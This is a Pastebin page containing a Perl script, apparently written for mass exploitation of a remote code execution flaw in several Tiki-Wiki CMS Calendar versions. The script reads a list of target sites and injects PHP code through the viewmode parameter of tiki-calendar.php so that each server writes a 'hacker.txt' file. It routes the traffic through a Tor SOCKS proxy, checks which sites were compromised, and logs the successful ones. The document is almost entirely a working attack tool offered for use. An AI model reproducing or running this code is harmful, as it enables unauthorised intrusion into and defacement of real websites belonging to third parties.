Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- # ->Coder By CrashBandicot
- #
- # Tiki-Wiki CMS Calendar 14.2, 12.5 LTS, 9.11 LTS, and 6.15 - Remote Code Execution
- # discovery by Dany Ouellet
- # ref: https://www.exploit-db.com/exploits/39965/
- use LWP::UserAgent;
- use LWP::Protocol::socks;
- use HTTP::Request::Common;
- if ($^O =~ /Win/) { system("cls"); } else { system("clear"); }
- print "
- Tiki Mass Explo!ter RCE
- by CrashBandicot
- Usage : $0 list.txt
- \n";
- open(tarrget,"<$ARGV[0]") or die "$!";
- while(<tarrget>){
- chomp($_);
- $webs = $_;
- print " [+] Scanning -> $webs";
- $payload = '/tiki-calendar.php?viewmode=%27;%20$z=fopen(%22hacker.txt%22,%27w%27);%20fwrite($z,(%22by%20hacker%22));fclose($z);$a=%27';
- $ua = LWP::UserAgent->new();
- $ua->proxy([qw/ http https /] => 'socks://127.0.0.1:9150');
- $ua->timeout(30);
- $ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5");
- $fuck = $ua->get($webs.$payload);
- $def = $webs."/hacker.txt";
- $check = $ua->get($def)->content;
- if($check =~/hacker/) {
- print "\n\n [+] File Uploaded >> $def\n";
- open(save ,">>savetiki.txt");
- print save "$def\n";
- close save;
- } else { print "\n [-] File Upload Fail\n"; }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement